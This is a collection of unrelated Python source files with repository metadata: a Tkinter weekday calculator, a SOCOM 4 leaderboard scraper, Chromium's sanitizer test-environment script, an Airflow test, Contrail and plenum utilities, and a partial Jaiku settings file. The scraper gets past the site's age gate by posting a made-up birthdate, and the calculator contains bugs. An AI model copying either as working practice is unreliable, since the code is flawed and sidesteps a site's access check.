font = ('Avenir', 13, 'normal'))
self.Description.grid(row = 1, column = 0,
columnspan = 7, padx = 5, pady = 5)
#Entry Boxes
self.Year = Label(root, padx = 9, text = 'Year:',
font = ('Avenir', 13, 'normal'))
self.Year.grid(row = 2, sticky = W, padx = 1)
self.Yeardisplay = Entry(root, width = 33)
self.Yeardisplay.grid(row = 2, column = 1, sticky = E)
self.Month = Label(root, padx = 9, text = 'Month:',
font = ('Avenir', 13, 'normal'))
self.Month.grid(row = 3, sticky = W, padx = 0)
self.Monthdisplay = Entry(root, width = 33)
self.Monthdisplay.grid(row = 3, column = 1, sticky = E)
self.Day = Label(root, padx = 9, text = 'Day:',
font = ('Avenir', 13, 'normal'))
self.Day.grid(row = 4, sticky = W, padx = 0)
self.Daydisplay = Entry(root, width = 33)
self.Daydisplay.grid(row = 4, column = 1, sticky = E)
self.Week = Label(root, padx = 9, text= 'Weekday:',
font = ('Avenir', 13, 'normal'))
self.Week.grid(row = 5, sticky = W, padx = 0)
self.Weekdaydisplay = Entry(root, width = 33,
state = 'readonly')
self.Weekdaydisplay.grid(row = 5, column = 1, sticky = E)
self.Extradisplay = Entry(root, width = 33,
state = 'readonly')
self.Extradisplay.grid(row = 6, column = 1, sticky = E)
#Calculate Button
self.Calculate = Button(text = 'Calculate',
command = self.calculate,
font = ('Avenir', 15, 'normal'))
self.Calculate.grid(row = 7, column = 0, columnspan = 8,
padx = 10, pady = 5, sticky = N+S+E+W)
#Clear Button
self.clear = Button(text = 'Clear',
command = self.clear,
font = ('Avenir', 15, 'normal'))
self.clear.grid(row = 8, column = 0, columnspan = 8,
padx = 10, pady = 5, sticky = N+S+E+W)
#Exit Button
self.Exit = Button(text = 'Exit',
command = root.destroy,
font = ('Avenir', 15, 'normal'))
self.Exit.grid(row = 9, column = 0, columnspan = 8,
padx = 10, pady = 5, sticky = N+S+E+W)
#Credits
self.Credits = Label(root, text = 'Raymond Wang 2018 ®',
font = ('Avenir', 15, 'italic'))
self.Credits.grid(row = 10, column = 0,
columnspan = 8, pady = 5, padx = 5)
#FUNCTIONS
#Clear command
def clear(self):
self.Yeardisplay.delete(0,END)
self.Monthdisplay.delete(0,END)
self.Daydisplay.delete(0,END)
self.clear_message(self.Weekdaydisplay)
self.clear_message(self.Extradisplay)
def clear_message(self, func):
func.configure(state='normal')
func.delete(0, END)
func.configure(state='readonly')
#Calculate command
def calculate(self):
year = self.Yeardisplay.get()
month = self.Monthdisplay.get()
day = self.Daydisplay.get()
if year.isdigit():
if year[0] == '0':
if len(year) == 1:
self.error_display(self.Extradisplay, 'Year 0 does not exist')
else:
self.error_display(self.Extradisplay, 'Remove preceding zeros')
elif month.isdigit():
self.month_digit(year, month, day)
elif month in self.months:
month = month.capitalize()
month_to_int = {'January':1, 'February':2,
'March':3, 'April':4,'May':5, 'June':6,
'July':7, 'August':8, 'September':9,
'October':10, 'November':11, 'December':12}
Month = str(month_to_int[month])
self.month_digit(year, Month, day)
else:
self.output(year, month, day.lstrip('0'))
elif len(year) == 0:
if len(month) == 0:
if len(day) == 0:
self.error_display(self.Extradisplay, '')
else:
self.error_display(self.Extradisplay, 'Error')
else:
self.error_display(self.Extradisplay, 'Error')
else:
self.error_display(self.Extradisplay, 'Error')
#Error handling regarding preceding zeros for day input
def month_digit(self, year, month, day):
if month[0] == '0':
if len(month) > 2:
self.error_display(self.Extradisplay, 'Remove preceding zeros')
else:
self.day_digit(year, int(month), day)
else:
self.day_digit(year, int(month), day)
#Error handling regarding preceding zeros for day input
def day_digit(self, year, month, day):
if day.isdigit():
if day[0] == '0':
if len(day) > 2:
self.error_display('Remove preceding zeros')
else:
self.output(year, month, day.lstrip('0'))
else:
self.output(year, month, day.lstrip('0'))
else:
self.output(year, month, day.lstrip('0'))
#Error handling for month
def output(self, year, month, day):
try:
if (int(month) in [1,3,5,7,8,10,12]):
self.condition(year, month, day, '31', '')
elif (int(month) in [4,6,9,11]):
self.condition(year, month, day, '30', '')
elif int(month) == 2:
if (((int(year) % 4) == 0 and
not (int(year) % 100) == 0)
or (int(year) % 400) == 0):
if int(year) == 1712:
if int(day) == 30:
#Easter Egg
self.condition(year, month, day, '30', '')
self.change_display(self.Extradisplay,
'1712/02/30 was a real date in Sweden')
else:
self.condition(year, month, day, '29', '')
else:
self.condition(year, month, day, '29', '')
else:
self.condition(year, month, day, '28', '29')
elif int(month) > 12:
self.error_display(self.Extradisplay, 'Enter month between 1-12 or month name')
except:
self.error_display(self.Extradisplay, 'Enter month between 1-12 or month name')
#Error handling for day
def condition(self, year, month, day, lastday, leapday):
try:
if len(day) == 0 or int(day) > int(lastday):
if int(month) == 2:
if day == leapday:
self.error_display(self.Extraisplay, 'Not a leap year')
else:
self.error_display(self.Extradisplay, 'Enter day between 1-' + lastday)
else:
self.error_display(self.Extradisplay, 'Enter day between 1-' + lastday)
elif int(day) <= int(lastday):
self.change_display(self.Weekdaydisplay, self.message(year, month, day))
except:
self.error_display(self.Extradisplay, 'Enter day between 1-' + lastday)
#Displays given weekday on the 'Weekday' entry box
def change_display(self, func, text):
func.configure(state='normal')
func.delete(0,END)
func.insert(INSERT, text)
func.configure(state='readonly')
#Error output
def error_display(self, func, text):
self.change_display(func, text)
#Returns message for output on entry box
def message(self, year, month, day):
weekday = ['Sunday', 'Monday', 'Tuesday',
'Wednesday', 'Thursday', 'Friday', 'Saturday']
a = int((14 - int(month))/12)
y = int(year) - a
m = int(month) + (12*a) -2
d = (int(day) + y + int(y/4) - int(y/100) +
int(y/400) + int((31*m)/12)) % 7
x = weekday[d]
name = self.wordmonth(month)
Day = self.ordinal(day)
StrYear = int(strftime('%Y'))
StrMonth = int(strftime('%m'))
StrDay = int(strftime('%d'))
DisplayTime = self.JulianDN(year, month, day)
CurrentDate = self.JulianDN(StrYear, StrMonth, StrDay)
if DisplayTime == CurrentDate:
message = self.r_output('Today is a ', x)
elif DisplayTime == CurrentDate + 1:
message = self.r_output('Tomorrow will be a ', x)
elif DisplayTime == CurrentDate - 1:
message = self.r_output('Yesterday was a ', x)
elif DisplayTime > CurrentDate:
message = self.g_output(name, Day, year, ' will be a ', x)
elif DisplayTime < CurrentDate:
message = self.g_output(name, Day, year, ' was a ', x)
return message
#Output if given date is today, yesterday or tomorrow
def r_output(self, text, day_of_week):
output = (text + day_of_week)
return output
#Output for days before or after current date
def g_output(self, Month, Day, Year, text, day_of_week):
output = (Month + ' ' + Day + ', ' + Year + text + day_of_week)
return output
#Returns ordinal for given day number
def ordinal(self, day):
teen_numbers = [11, 12, 13, 14, 15, 16, 17, 18, 19]
output = ['th','st', 'nd', 'rd', 'th', 'th',
'th', 'th', 'th', 'th', 'th']
if int(day) in teen_numbers:
return (day + 'th')
else:
return (day + output[int(day[-1])])
#Calculates given weekday with Julian Date Number
def JulianDN(self, Y,M,D):
a = int((14 - int(M))/12)
y = int(Y) + 4800 - a
m = int(M) + (12 * a) - 3
JDN = (int(D) + int(((153 * m) + 2) /5) + (365 * y)
+ int(y/4) - int(y/100) + int(y/400) - 32045)
return JDN
#Return month name from input
def wordmonth(self, month):
monthname = [word for word in self.months if word.istitle()]
Month = int(month) -1
return monthname[Month]
root = Tk()
Calculator(root)
root.mainloop()
| apache-2.0 | -7,962,390,991,995,282,000 | 39.251701 | 95 | 0.496704 | false |
aleximplode/s4scraper | scrapef.py | 1 | 9681 | #!/usr/bin/python
'''
Author: Alexander Godlewski
Year: 2011
A script to browse through the leaderboards for SOCOM 4
using multiprocessing to overcome network blocking
Gather the results and dump to a CSV file
There are issues with the implementation of the leaderboards
that causes the time played for a player to often be
synchronized to 60 minute changes
Another issue is that the leaderboards are constantly changing
across page views. So it a player may move from one page to
another and be re-parsed and the another player could move to
an already parsed page and not be recorded. It would take constant
runs of this script to gather all the players.
Expect this process to take approx. 21 minutes or more, depending on how
many processes you choose(variable numproc). It has to gather 100k
players over 5k pages
'''
import urllib2, urllib, re, os, multiprocessing
from time import time
manager = multiprocessing.Manager()
requestcount = manager.Value('d', 0)
pages = manager.Value('d', 0)
playerdata = manager.dict()
numproc = 24
processes = []
waitevent = manager.Event()
procwait = manager.Value('d', numproc)
procwaitlock = manager.Lock()
pagelist = manager.list()
pagelistlock = manager.Lock()
pagecountlock = manager.Lock()
requestcountlock = manager.Lock()
playerdatalock = manager.Lock()
# Regexs
re_viewstate = re.compile(r'__VIEWSTATE" value="(?P<viewstate>.*?)"')
re_records = re.compile(r'Displaying .*? of (?P<records>[0-9,]*) records')
re_pages = re.compile(r'<a id="ctl00_phContent_leaderboards_pager_btnLast".*?>\.\.\. (?P<pages>\d*)</a>')
re_player = re.compile(r'<span id="ctl00_phContent_leaderboards_rptStatsTable_ctl.*?<tr.*?>(?:</span>)?(?P<player>.*?)</tr>', re.DOTALL) # Get a player block
re_playeritems = re.compile(r'<td class=".*?">(?:\s*<a.*?>)?(?P<data>.+?)(?:</a>\s*)?</td>', re.DOTALL) # Individual player fields
re_prevpage = re.compile(r'__PREVIOUSPAGE" value="(?P<prev>.*?)"') # Previous page key
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:6.0) Gecko/20100101 Firefox/6.0 Iceweasel/6.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-us,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Connection': 'keep-alive',
'Cache-Control': 'no-cache, no-cache',
}
def scrape():
''' The main scraping function '''
t0 = time()
try:
for i in range(1, numproc + 1):
process = multiprocessing.Process(
target = scrapeproc,
args = (
waitevent,
pagelist,
pagelistlock,
procwait,
procwaitlock,
playerdatalock,
requestcountlock,
pagecountlock,
pages,
i - 1,
playerdata,
requestcount
)
)
processes.append(process)
process.start()
for p in processes:
p.join()
except urllib2.HTTPError, error:
print ''
print 'There has been an error with the following request:'
print '%4d: %d - %s' % (requestcount, error.getcode(), error.geturl())
for p in processes:
p.terminate()
t1 = time()
print ''
print '###########################################################################'
print '%d second%s elapsed(%4d requests, %6d players)' % (t1 - t0, '' if t1 - t0 == 1 else 's', requestcount.value, len(playerdata))
print '###########################################################################'
filename = 'output-%s-%s.csv' % (int(time()), os.getpid())
print ''
print 'Outputting the playerdata to %s' % filename
outputcsv(filename)
def scrapeproc(we, pl, pllock, pw, pwlock, pdlock, rclock, plock, p, offset, pd, rc):
''' A process to scrape pages '''
opener = urllib2.build_opener()
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPCookieProcessor())
opener.add_handler(urllib2.HTTPRedirectHandler())
opener.add_handler(urllib2.UnknownHandler())
data = readurl(rclock, requestcount, opener, 'http://www.socom.com/en-us/Leaderboards/SOCOM4', 'Initial page request')
vs = parseviewstate(data)
postdata = genpostdata(vs, '', 'lbsubmit', {'dlDate1': 7, 'dlDate2': 21, 'dlDate3': 1986, 'scriptManager': 'panelCulture|lbSubmit'})
data = readurl(rclock, requestcount, opener, 'http://www.socom.com/?url=%2fen-us%2fLeaderboards%2fSOCOM4', 'Submit to agegate', postdata)
data = readurl(rclock, requestcount, opener, 'http://www.socom.com/en-us/Leaderboards/SOCOM4', 'Load first leaderboard page')
pagecount = parsepagecount(data)
plock.acquire()
if pagecount > p.value:
p.value = pagecount
plock.release()
# Decrement procwait count, at 0 continue
pwlock.acquire()
if pw.value == 1:
print 'Expecting %d pages' % p.value
pl.extend(range(1, p.value + 1))
we.set()
pw.value = pw.value - 1
pwlock.release()
# Wait until all processes have reached the same point so
# the page count is at the max value found. All
# openerdirectors are prepared to visit the pages
we.wait()
# Loop until there are no more pages left to be parsed
while True:
pllock.acquire()
# No pages left
if not pl:
pllock.release()
break
pagenum = pl.pop(0)
pllock.release()
vs = parseviewstate(data)
prev = parseprevpagekey(data)
postdata = genpostdata(vs, '', '',
{
'__PREVIOUSPAGE': prev,
'ctl00$phContent$leaderboards$txtName': '',
'ctl00$phContent$leaderboards$btnGoToRank': 'GO',
'ctl00$phContent$leaderboards$txtRank': ((pagenum - 1) * 20) + 1,
'ctl00$scriptManager': 'ctl00$phContent$leaderboards$panelLeaderBoards|ctl00$phContent$leaderboards$btnGoToRank'
}
)
data = readurl(rclock, rc, opener, 'http://www.socom.com/en-us/Leaderboards/SOCOM4', 'LB page %d of %d' % (pagenum, p.value), postdata)
parseplayers(pdlock, pd, data)
def readurl(rclock, rc, od, url, name, data = []):
''' Read a url and print info '''
rclock.acquire()
currequestnum = rc.value + 1
rc.value += 1
rclock.release()
req = urllib2.Request(url, urllib.urlencode(data), headers)
page = od.open(req)
print '%4d: %d - (%s)%s' % (currequestnum, page.getcode(), name, page.geturl())
return page.read()
def parseplayers(pdlock, pd, data):
''' Parse the player data for a response '''
matches = re_player.findall(data)
for match in matches:
fields = re_playeritems.findall(match)
name = fields[1].strip().replace(',', '')
pdlock.acquire()
if name in pd:
print 'WARNING: %s already parsed' % name
pd[name] = tuple(fields[i].strip().replace(',', '') for i in (0, 2, 3, 4, 5, 6, 7, 8))
pdlock.release()
def parseviewstate(data):
''' Parse the viewstate for a response '''
rval = None
match = re_viewstate.search(data)
if match:
rval = match.group('viewstate')
return rval
def parsepagecount(data):
''' Get the page count to show the expected number of pages scraped '''
rval = 0
match = re_pages.search(data)
if match:
rval = int(match.group('pages'))
return rval
def parseprevpagekey(data):
''' Get the previous page key '''
rval = None
match = re_prevpage.search(data)
if match:
rval = match.group('prev')
return rval
def genpostdata(vs, ea, et, other = None):
''' Generate a POST dict, just simplifies code
vs = viewstate
ea = event arguement
et = event target
other = other post data (dict)
'''
data = dict()
data['__VIEWSTATE'] = vs
data['__EVENTARGUMENT'] = ea
data['__EVENTTARGET'] = et
if other:
data = dict(data.items() + other.items())
return data
def outputcsv(filename):
''' Output the csv file '''
try:
f = open(filename, 'w')
for name, data in playerdata.items():
f.write('%s,%s\n' % (name, ','.join(data)))
f.close()
except IOError:
print 'There was an issue writing to %s' % filename
if __name__ == '__main__':
scrape() | mit | -3,767,706,355,816,823,300 | 34.595588 | 157 | 0.528664 | false |
highweb-project/highweb-webcl-html5spec | testing/test_env.py | 12 | 8394 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Sets environment variables needed to run a chromium unit test."""
import os
import stat
import subprocess
import sys
# This is hardcoded to be src/ relative to this script.
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
CHROME_SANDBOX_ENV = 'CHROME_DEVEL_SANDBOX'
CHROME_SANDBOX_PATH = '/opt/chromium/chrome_sandbox'
def get_sandbox_env(env):
"""Returns the environment flags needed for the SUID sandbox to work."""
extra_env = {}
chrome_sandbox_path = env.get(CHROME_SANDBOX_ENV, CHROME_SANDBOX_PATH)
# The above would silently disable the SUID sandbox if the env value were
# an empty string. We don't want to allow that. http://crbug.com/245376
# TODO(jln): Remove this check once it's no longer possible to disable the
# sandbox that way.
if not chrome_sandbox_path:
chrome_sandbox_path = CHROME_SANDBOX_PATH
extra_env[CHROME_SANDBOX_ENV] = chrome_sandbox_path
return extra_env
def trim_cmd(cmd):
"""Removes internal flags from cmd since they're just used to communicate from
the host machine to this script running on the swarm slaves."""
sanitizers = ['asan', 'lsan', 'msan', 'tsan']
internal_flags = frozenset('--%s=%d' % (name, value)
for name in sanitizers
for value in [0, 1])
return [i for i in cmd if i not in internal_flags]
def fix_python_path(cmd):
"""Returns the fixed command line to call the right python executable."""
out = cmd[:]
if out[0] == 'python':
out[0] = sys.executable
elif out[0].endswith('.py'):
out.insert(0, sys.executable)
return out
def get_sanitizer_env(cmd, asan, lsan, msan, tsan):
"""Returns the envirnoment flags needed for sanitizer tools."""
extra_env = {}
# Instruct GTK to use malloc while running sanitizer-instrumented tests.
extra_env['G_SLICE'] = 'always-malloc'
extra_env['NSS_DISABLE_ARENA_FREE_LIST'] = '1'
extra_env['NSS_DISABLE_UNLOAD'] = '1'
# TODO(glider): remove the symbolizer path once
# https://code.google.com/p/address-sanitizer/issues/detail?id=134 is fixed.
symbolizer_path = os.path.join(ROOT_DIR,
'third_party', 'llvm-build', 'Release+Asserts', 'bin', 'llvm-symbolizer')
if lsan or tsan:
# LSan is not sandbox-compatible, so we can use online symbolization. In
# fact, it needs symbolization to be able to apply suppressions.
symbolization_options = ['symbolize=1',
'external_symbolizer_path=%s' % symbolizer_path]
elif (asan or msan) and sys.platform not in ['win32', 'cygwin']:
# ASan uses a script for offline symbolization, except on Windows.
# Important note: when running ASan with leak detection enabled, we must use
# the LSan symbolization options above.
symbolization_options = ['symbolize=0']
# Set the path to llvm-symbolizer to be used by asan_symbolize.py
extra_env['LLVM_SYMBOLIZER_PATH'] = symbolizer_path
else:
symbolization_options = []
if asan:
asan_options = symbolization_options[:]
if lsan:
asan_options.append('detect_leaks=1')
if asan_options:
extra_env['ASAN_OPTIONS'] = ' '.join(asan_options)
if sys.platform == 'darwin':
isolate_output_dir = os.path.abspath(os.path.dirname(cmd[0]))
# This is needed because the test binary has @executable_path embedded in
# it that the OS tries to resolve to the cache directory and not the
# mapped directory.
extra_env['DYLD_LIBRARY_PATH'] = str(isolate_output_dir)
if lsan:
if asan or msan:
lsan_options = []
else:
lsan_options = symbolization_options[:]
if sys.platform == 'linux2':
# Use the debug version of libstdc++ under LSan. If we don't, there will
# be a lot of incomplete stack traces in the reports.
extra_env['LD_LIBRARY_PATH'] = '/usr/lib/x86_64-linux-gnu/debug:'
extra_env['LSAN_OPTIONS'] = ' '.join(lsan_options)
if msan:
msan_options = symbolization_options[:]
if lsan:
msan_options.append('detect_leaks=1')
extra_env['MSAN_OPTIONS'] = ' '.join(msan_options)
if tsan:
tsan_options = symbolization_options[:]
extra_env['TSAN_OPTIONS'] = ' '.join(tsan_options)
return extra_env
def get_sanitizer_symbolize_command(json_path=None, executable_path=None):
"""Construct the command to invoke offline symbolization script."""
script_path = os.path.join(
ROOT_DIR, 'tools', 'valgrind', 'asan', 'asan_symbolize.py')
cmd = [sys.executable, script_path]
if json_path is not None:
cmd.append('--test-summary-json-file=%s' % json_path)
if executable_path is not None:
cmd.append('--executable-path=%s' % executable_path)
return cmd
def get_json_path(cmd):
"""Extract the JSON test summary path from a command line."""
json_path_flag = '--test-launcher-summary-output='
for arg in cmd:
if arg.startswith(json_path_flag):
return arg.split(json_path_flag).pop()
return None
def symbolize_snippets_in_json(cmd, env):
"""Symbolize output snippets inside the JSON test summary."""
json_path = get_json_path(cmd)
if json_path is None:
return
try:
symbolize_command = get_sanitizer_symbolize_command(
json_path=json_path, executable_path=cmd[0])
p = subprocess.Popen(symbolize_command, stderr=subprocess.PIPE, env=env)
(_, stderr) = p.communicate()
except OSError as e:
print >> sys.stderr, 'Exception while symbolizing snippets: %s' % e
raise
if p.returncode != 0:
print >> sys.stderr, "Error: failed to symbolize snippets in JSON:\n"
print >> sys.stderr, stderr
raise subprocess.CalledProcessError(p.returncode, symbolize_command)
def run_executable(cmd, env):
"""Runs an executable with:
- environment variable CR_SOURCE_ROOT set to the root directory.
- environment variable LANGUAGE to en_US.UTF-8.
- environment variable CHROME_DEVEL_SANDBOX set
- Reuses sys.executable automatically.
"""
extra_env = {}
# Many tests assume a English interface...
extra_env['LANG'] = 'en_US.UTF-8'
# Used by base/base_paths_linux.cc as an override. Just make sure the default
# logic is used.
env.pop('CR_SOURCE_ROOT', None)
extra_env.update(get_sandbox_env(env))
# Copy logic from tools/build/scripts/slave/runtest.py.
asan = '--asan=1' in cmd
lsan = '--lsan=1' in cmd
msan = '--msan=1' in cmd
tsan = '--tsan=1' in cmd
if sys.platform in ['win32', 'cygwin']:
# Symbolization works in-process on Windows even when sandboxed.
use_symbolization_script = False
else:
# LSan doesn't support sandboxing yet, so we use the in-process symbolizer.
# Note that ASan and MSan can work together with LSan.
use_symbolization_script = (asan or msan) and not lsan
if asan or lsan or msan or tsan:
extra_env.update(get_sanitizer_env(cmd, asan, lsan, msan, tsan))
if lsan or tsan:
# LSan and TSan are not sandbox-friendly.
cmd.append('--no-sandbox')
cmd = trim_cmd(cmd)
# Ensure paths are correctly separated on windows.
cmd[0] = cmd[0].replace('/', os.path.sep)
cmd = fix_python_path(cmd)
print('Additional test environment:\n%s\n'
'Command: %s\n' % (
'\n'.join(' %s=%s' %
(k, v) for k, v in sorted(extra_env.iteritems())),
' '.join(cmd)))
env.update(extra_env or {})
try:
# See above comment regarding offline symbolization.
if use_symbolization_script:
# Need to pipe to the symbolizer script.
p1 = subprocess.Popen(cmd, env=env, stdout=subprocess.PIPE,
stderr=sys.stdout)
p2 = subprocess.Popen(
get_sanitizer_symbolize_command(executable_path=cmd[0]),
env=env, stdin=p1.stdout)
p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.
p1.wait()
p2.wait()
# Also feed the out-of-band JSON output to the symbolizer script.
symbolize_snippets_in_json(cmd, env)
return p1.returncode
else:
return subprocess.call(cmd, env=env)
except OSError:
print >> sys.stderr, 'Failed to start %s' % cmd
raise
def main():
return run_executable(sys.argv[1:], os.environ.copy())
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | -6,769,126,356,607,834,000 | 33.68595 | 80 | 0.668096 | false |
nathanielvarona/airflow | tests/task/task_runner/test_cgroup_task_runner.py | 3 | 1867 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
from airflow.task.task_runner.cgroup_task_runner import CgroupTaskRunner
class TestCgroupTaskRunner(unittest.TestCase):
@mock.patch("airflow.task.task_runner.base_task_runner.BaseTaskRunner.__init__")
@mock.patch("airflow.task.task_runner.base_task_runner.BaseTaskRunner.on_finish")
def test_cgroup_task_runner_super_calls(self, mock_super_on_finish, mock_super_init):
"""
This test ensures that initiating CgroupTaskRunner object
calls init method of BaseTaskRunner,
and when task finishes, CgroupTaskRunner.on_finish() calls
super().on_finish() to delete the temp cfg file.
"""
local_task_job = mock.Mock()
local_task_job.task_instance = mock.MagicMock()
local_task_job.task_instance.run_as_user = None
local_task_job.task_instance.command_as_list.return_value = ['sleep', '1000']
runner = CgroupTaskRunner(local_task_job)
assert mock_super_init.called
runner.on_finish()
assert mock_super_on_finish.called
| apache-2.0 | 6,412,202,582,494,916,000 | 42.418605 | 89 | 0.728441 | false |
vmahuli/contrail-controller | src/config/test/utils/verification_util.py | 29 | 3819 | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import urllib2
import xmltodict
import json
import requests
from lxml import etree
import socket
class JsonDrv (object):
def _http_con(self, url):
return urllib2.urlopen(url)
def load(self, url):
return json.load(self._http_con(url))
class XmlDrv (object):
def load(self, url):
try:
resp = requests.get(url)
return etree.fromstring(resp.text)
except requests.ConnectionError, e:
print "Socket Connection error : " + str(e)
return None
class VerificationUtilBase (object):
def __init__(self, ip, port, drv=JsonDrv):
self._ip = ip
self._port = port
self._drv = drv()
self._force_refresh = False
def get_force_refresh(self):
return self._force_refresh
def set_force_refresh(self, force=False):
self._force_refresh = force
return self.get_force_refresh()
def _mk_url_str(self, path):
if path:
if path.startswith('http:'):
return path
return "http://%s:%d/%s" % (self._ip, self._port, path)
def dict_get(self, path='', drv=None):
try:
if path:
if drv is not None:
return drv().load(self._mk_url_str(path))
return self._drv.load(self._mk_url_str(path))
except urllib2.HTTPError:
return None
# end dict_get
class Result (dict):
def __init__(self, d={}):
super(Result, self).__init__()
self.update(d)
def xpath(self, *plist):
''' basic path '''
d = self
for p in plist:
d = d[p]
return d
class EtreeToDict(object):
"""Converts the xml etree to dictionary/list of dictionary."""
def __init__(self, xpath):
self.xpath = xpath
def _handle_list(self, elems):
"""Handles the list object in etree."""
a_list = []
for elem in elems.getchildren():
rval = self._get_one(elem, a_list)
if 'element' in rval.keys():
a_list.append(rval['element'])
elif 'list' in rval.keys():
a_list.append(rval['list'])
else:
a_list.append(rval)
if not a_list:
return None
return a_list
def _get_one(self, xp, a_list=None):
"""Recrusively looks for the entry in etree and converts to dictionary.
Returns a dictionary.
"""
val = {}
child = xp.getchildren()
if not child:
val.update({xp.tag: xp.text})
return val
for elem in child:
if elem.tag == 'list':
val.update({xp.tag: self._handle_list(elem)})
else:
rval = self._get_one(elem, a_list)
if elem.tag in rval.keys():
val.update({elem.tag: rval[elem.tag]})
else:
val.update({elem.tag: rval})
return val
def get_all_entry(self, path):
"""All entries in the etree is converted to the dictionary
Returns the list of dictionary/didctionary.
"""
xps = path.xpath(self.xpath)
if type(xps) is not list:
return self._get_one(xps)
val = []
for xp in xps:
val.append(self._get_one(xp))
if len(val) == 1:
return val[0]
return val
def find_entry(self, path, match):
"""Looks for a particular entry in the etree.
Returns the element looked for/None.
"""
xp = path.xpath(self.xpath)
f = filter(lambda x: x.text == match, xp)
if len(f):
return f[0].text
return None
| apache-2.0 | 2,835,414,122,174,178,300 | 24.46 | 79 | 0.524221 | false |
evernym/zeno | plenum/server/inconsistency_watchers.py | 2 | 1031 | from typing import Callable, Iterable
from plenum.server.quorums import Quorums
class NetworkInconsistencyWatcher:
def __init__(self, cb: Callable):
self.callback = cb
self._nodes = set()
self._connected = set()
self._quorums = Quorums(0)
self._reached_consensus = False
def connect(self, name: str):
self._connected.add(name)
if self._quorums.strong.is_reached(len(self._connected)):
self._reached_consensus = True
def disconnect(self, name: str):
self._connected.discard(name)
if self._reached_consensus and not self._quorums.weak.is_reached(len(self._connected)):
self._reached_consensus = False
self.callback()
@property
def nodes(self):
return self._nodes
def set_nodes(self, nodes: Iterable[str]):
self._nodes = set(nodes)
self._quorums = Quorums(len(self._nodes))
def _has_consensus(self):
return self._quorums.weak.is_reached(len(self._connected))
| apache-2.0 | -8,176,798,623,406,414,000 | 30.242424 | 95 | 0.627546 | false |
rhijul/jaikuengine | settings.py | 28 | 11254 | # Copyright 2009 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import os.path
###
# Django related settings
###
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
# This stuff is always going to be the same for an App Engine instance
DATABASE_ENGINE = 'appengine' # 'appengine' is the only supported engine
DATABASE_NAME = '' # Not used with appengine
DATABASE_USER = '' # Not used with appengine
DATABASE_PASSWORD = '' # Not used with appengine
DATABASE_HOST = '' # Not used with appengine
DATABASE_PORT = '' # Not used with appengine
# The appengine_django code doesn't care about the address of memcached
# because it is a built in API for App Engine
CACHE_BACKEND = 'memcached://'
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'I AM SO SECRET'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
MIDDLEWARE_CLASSES = (
'middleware.domain.DomainMiddleware',
'middleware.auth.AuthenticationMiddleware',
'middleware.exception.ExceptionMiddleware',
'middleware.cache.CacheMiddleware',
'middleware.strip_whitespace.WhitespaceMiddleware',
'middleware.profile.ProfileMiddleware',
)
ROOT_URLCONF = 'urls'
# Where the templates live, you probably don't want to change this unless you
# know what you're doing
TEMPLATE_DIRS = (
os.path.dirname(__file__),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.debug',
'django.core.context_processors.request',
'common.context_processors.settings',
'common.context_processors.flash',
'common.context_processors.components',
)
# Only apps under INSTALLED_APPS will be automatically tested via
# `python manage.py test` and the profiling code takes this list into
# account while filtering calls
INSTALLED_APPS = (
'appengine_django',
'common',
'actor',
'api',
'channel',
'explore',
'join',
'flat',
'login',
'front',
'invite',
'install',
'confirm',
'components',
)
# We override the default test runner so that we can be Totally Awesome
TEST_RUNNER = 'common.test.runner.run_tests'
####
#
# Below this is custom for Jaiku Engine (not related to Django)
#
####
# This is a dynamic setting so that we can check whether we have been run
# locally, it is used mainly for making special testing-only tweaks. Ideally
# we wouldn't need this, but the alternatives so far have been tricky.
MANAGE_PY = os.path.exists('manage.py')
# This is the name of the site that will be used whenever it refers to itself
SITE_NAME = 'My-ku'
SUPPORT_CHANNEL = 'support'
# This is the colloquial name for an entry, mostly used for branding purposes
POST_NAME = 'Post'
# This is the name of the root user of the site
ROOT_NICK = '[email protected]'
# This is the domain where this is installed on App Engine. It will be
# necessary to know this if you plan on enabling SSL for login and join.
GAE_DOMAIN = 'example.appspot.com'
# Enabling this means we expect to be spending most of our time on a
# Hosted domain
HOSTED_DOMAIN_ENABLED = True
